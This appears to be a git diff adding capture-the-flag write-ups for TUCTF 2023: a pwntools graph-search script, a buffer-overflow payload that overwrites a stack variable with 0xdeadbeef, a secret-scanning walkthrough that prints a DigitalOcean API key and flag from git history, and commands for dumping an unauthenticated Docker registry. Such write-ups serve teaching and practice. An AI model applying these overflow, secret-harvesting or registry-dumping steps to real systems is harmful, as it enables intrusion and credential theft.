diff --git a/2023_tuctf/agent.py b/2023_tuctf/agent.py
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index 0000000..684f124
--- /dev/null
+++ b/2023_tuctf/agent.py
@@ -0,0 +1,213 @@
+from pwn import *
+import random
+# Change logging level to help with debugging (error/warning/info/debug)
+#context.log_level = 'debug'
+def mapper():
+ conn.sendlineafter(b':', 'HAHAHAHAHHAHAHAHAHAHAH')
+ status = conn.recvuntil(b'Option: ', drop=True).decode('latin-1')
+ print(status)
+ print()
+ print()
+ conn.send(b'2\r\n')
+ current = conn.recvuntil(b'Investigate:', drop=True).decode('latin-1')
+ print("current: "+current)
+ print()
+ print()
+ print()
+ path = ['Attaya']
+ with open('log.txt', 'a') as f:
+ f.write("===================================================\n'\n")
+ f.close()
+ while True:
+ city_options = []
+ current = current.split('\n')
+ for line in current:
+ if line.startswith('- Current'):
+ current_city = line.split(':')[1]
+ elif line.startswith('- Next'):
+ neighbours_splitted = line.split('|')
+ for i in range(len(neighbours_splitted)):
+ if i % 2: # if i is odd
+ city_options.append(neighbours_splitted[i].strip())
+ elif line.startswith('- Description'):
+ description = line.split(':')[1]
+ next_city = random.choice(city_options)
+ path.append(next_city)
+ print("current_city: "+str(current_city))
+ print("city_options: "+str(city_options))
+ print("description: "+str(description))
+ print("path: "+str(path))
+ print()
+ with open('log.txt', 'a') as f:
+ f.write("current_city: "+str(current_city)+'\n')
+ f.write("city_options: "+str(city_options)+'\n')
+ f.write("description: "+str(description)+'\n')
+ f.write("path: "+str(path)+'\n\n')
+ f.close()
+ conn.send(next_city + '\n')
+ current = conn.recvuntil(b'Investigate:', drop=True).decode('latin-1')
+def get_path():
+ success = False
+ path_costs = {}
+ while not success:
+ neighbours = {
+ 'Attaya': {
+ 'Belandris': 10,
+ 'Delato': 5,
+ 'Charity': 3
+ },
+ 'Charity': {
+ 'Belandris': 8,
+ 'Emell': 2,
+ 'Flais': 8,
+ 'Attaya': 3,
+ 'Haphsa': 3,
+ 'Delato': 1,
+ },
+ 'Haphsa': {
+ 'Iyona': 8,
+ 'Kepliker': 7,
+ 'Melyphora': 8,
+ 'Queria': 10,
+ 'Delato': 1,
+ },
+ 'Melyphora': {
+ 'Partamo': 4,
+ 'Shariot': 11,
+ 'Queria': 1,
+ },
+ 'Queria': {
+ 'Partamo': 1,
+ 'Rhenora': 6,
+ 'Shariot': 10,
+ },
+ 'Partamo': {
+ 'Osiros': 1,
+ 'Rhenora': 5,
+ 'Shariot': 9,
+ },
+ 'Flais': {
+ 'Gevani': 3,
+ 'Iyona': 3,
+ 'Haphsa': 1,
+ },
+ 'Delato': {
+ 'Flais': 5,
+ 'Iyona': 5,
+ 'Belandris': 3,
+ },
+ 'Belandris': {
+ 'Jolat': 15,
+ 'Gevani': 8,
+ 'Emell': 1,
+ },
+ 'Jolat': {
+ 'Osiros': 7,
+ 'Leter': 4,
+ 'Kepliker': 5,
+ },
+ 'Gevani': {
+ 'Jolat': 8,
+ 'Iyona': 1,
+ 'Haphsa': 6,
+ },
+ 'Emell': {
+ 'Gevani': 5,
+ 'Iyona': 3,
+ 'Flais': 5,
+ },
+ 'Iyona': {
+ 'Jolat': 15,
+ 'Leter': 4,
+ 'Kepliker': 3,
+ },
+ 'Kepliker': {
+ 'Leter': 5,
+ 'Osiros': 2,
+ 'Partamo': 6,
+ 'Queria': 7,
+ 'Delato': 2,
+ 'Melyphora': 5,
+ },
+ 'Leter': {
+ 'Osiros': 3,
+ 'Rhenora': 10,
+ },
+ 'Osiros': {
+ 'Shariot': 8,
+ 'Rhenora': 6,
+ },
+ 'Rhenora': {
+ 'Notasto': 2,
+ 'Shariot': 1,
+ },
+ 'Notasto': {
+ 'Shariot': 7
+ },
+ }
+ current_city = 'Attaya'
+ path = ['Attaya']
+ path_cost = 0
+ i = 0
+ while neighbours[current_city] != {}:
+ new_city = random.choice(list(neighbours[current_city].keys()))
+ path_cost += neighbours[current_city][new_city]
+ #print("i: "+str(i))
+ #print("current_city: "+current_city+" "+str(neighbours[current_city]))
+ #print("path_cost: "+str(path_cost))
+ #print("path: "+str(path))
+ #print()
+ current_city = new_city
+ path.append(new_city)
+ i += 1
+ if current_city == 'Shariot':
+ path_costs[path_cost] = path
+ break
+ # find path with lowest cost:
+ try:
+ lowest_cost = min(path_costs.keys())
+ except ValueError:
+ continue
+ print("cost: "+str(lowest_cost)+", path: "+str(path_costs[lowest_cost]))
+#while True:
+# try:
+# print("===================================================")
+# print("trying to connect...")
+# conn = remote('chal.tuctf.com', 30012)
+# print("executing mapper()")
+# print()
+# print()
+# mapper()
+# print("closing connection...")
+# conn.close()
+# sleep(1)
+# except EOFError:
+# continue
diff --git a/2023_tuctf/hidden-value.png b/2023_tuctf/hidden-value.png
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index 0000000..6a99bd6
Binary files /dev/null and b/2023_tuctf/hidden-value.png differ
diff --git a/2023_tuctf/writeup.md b/2023_tuctf/writeup.md
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index 0000000..f5b0c95
--- /dev/null
+++ b/2023_tuctf/writeup.md
@@ -0,0 +1,115 @@
+# tuctf 2023
+### Index
+- [Forensics](#forensics)
+ - [state of the git](#state-of-the-git)
+- [Pwn](#pwn)
+ - [hidden values](#hidden-values)
+- [Misc](#misc)
+ - [silly registry](#silly-registry)
+ - [secret agent](#secret-agent)
+# Forensics
+## state of the git
+given is an git repository, with an IaC (Infrastructure as Code) codebase written in Terraform.
+You can search the repository for api keys with tools like [trufflehog](https://github.com/trufflesecurity/trufflehog), which will give you an digitalocean v2 API key.
+# run "trufflehog filesystem ." inside git repository
+🐷🔑🐷 TruffleHog. Unearth your secrets. 🐷🔑🐷
+Found unverified result 🐷🔑❓
+Detector Type: DigitalOceanV2
+Decoder Type: BASE64
+Raw result: dop_v1_07fbc880cf053a91979807dfaaf8ad5c9880abae1f8df2ccece966942af41408
+File: .git/objects/95/5de908450115ce7b6892c2a58c03e7e2221a6f
+Line: 60
+# inspect the git object further
+git cat-file -p 955de908450115ce7b6892c2a58c03e7e2221a6f
+# the flag is base64 encoded in following line:
+"password": "VFVDVEZ7NzNycjRmMHJtX1M3QTczLTF5XzUzY3IzNzV9Cg==", // ZG9wX3YxXzA3ZmJjODgwY2YwNTNhOTE5Nzk4MDdkZmFhZjhhZDVjOTg4MGFiYWUxZjhkZjJjY2VjZTk2Njk0MmFmNDE0MDgK < Change this before going !
+# Pwn
+## hidden values
+Given is an tcp socket, to whom you can connect with netcat.
+You need to overwrite an variable on the stack with 0xdeadbeef, through an buffer overflow to trigger the if statement and get the flag:
+from pwn import *
+# Change logging level to help with debugging (error/warning/info/debug)
+context.log_level = 'debug'
+# connect
+io = remote("chal.tuctf.com", 30011)
+# Build the payload
+payload = flat(
+ b'A' * 44,
+ p32(0xdeadbeef)
+# Send the payload
+io.sendlineafter(b':', payload)
+# bruteforce location of 0xdeadbeef locally:
+#for i in range(0,100):
+# io = process('./hidden-value')
+# io.sendlineafter(b':', b'A' * i + p32(0xdeadbeef))
+# print(io.recvall().decode('latin-1'))
+# Misc
+## silly registry
+given is a hostname and port.
+On the port runs https://distribution.github.io/distribution which is docker registry software to host docker container images.
+The registry uses silly authorization, which is for developing purposes and only check if the Authorization header is present and not the content.
+- https://distribution.github.io/distribution/about/configuration/#silly
+- https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry
+- https://github.com/Syzik/DockerRegistryGrabber
+# connect with Authorization header and retrieve image list
+curl -H "Authorization: anything" http://chal.tuctf.com:30003/v2/_catalog
+# use docker registry grabber to enumerate
+python drg.py -A "lkas" http://chal.tuctf.com:30003/v2/ --dump_all
+# the flag is one of the extracted images
+## secret agent
+given is a tcp socket to whom you can connect with netcat.
+First you need to find the correct key, which is "HAHAHAHAHHAHAHAHAHAHAH"
+Script for mapping the cities with their costs and calculating the cheapest path is [agent.py](./agent.py). The correct path with a cost of 20 is ['Attaya', 'Charity', 'Emell', 'Iyona', 'Kepliker', 'Osiros', 'Rhenora', 'Shariot'].
+you get text in the braille alphabet " ⠥⠞⠀⠞⠉⠀⠎⠊⠋⠀⠍⠁⠀⠵⠁⠀⠝⠊⠀⠺⠊⠛⠀⠇⠇⠊⠀⠕⠉⠀⠍⠀⠑⠀⠃⠀⠅⠉⠁⠀⠛⠁⠀⠝⠊⠁".
+When decoding it with https://www.dcode.fr/braille-alphabet you get "UT TC SIF MA ZA NI WIG LLI OC M E B KCA GA NIA".
+Which is little endian, so you need to read each chunck from back to front, which results to TUCTFISAMAZINGIWILLCOMEBACKAGAIN.
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+# ctf 2024
+### Index
+- [Web](#web)
+ - [chal1](#chal1)
+ - [chal2](#chal2)
+ - [chal3](#chal3)
+- [Cryptography](#cryptography)
+- [Reversing](#Reversing)
+- [Pwn](#pwn)
+- [Forensics](#forensics)
+- [Osint](#osint)
+- [Programming](#programming)
+- [Stegonography](#stegonography)
+- [Network](#Network)
+- [Misc](#misc)
+# Web
+## chal1
+## chal2
+## chal3
+# Cryptography
+# Reversing
+# Pwn
+# Forensics
+# Osint
+# Programming
+# Stegonography
+# Network
+# Misc
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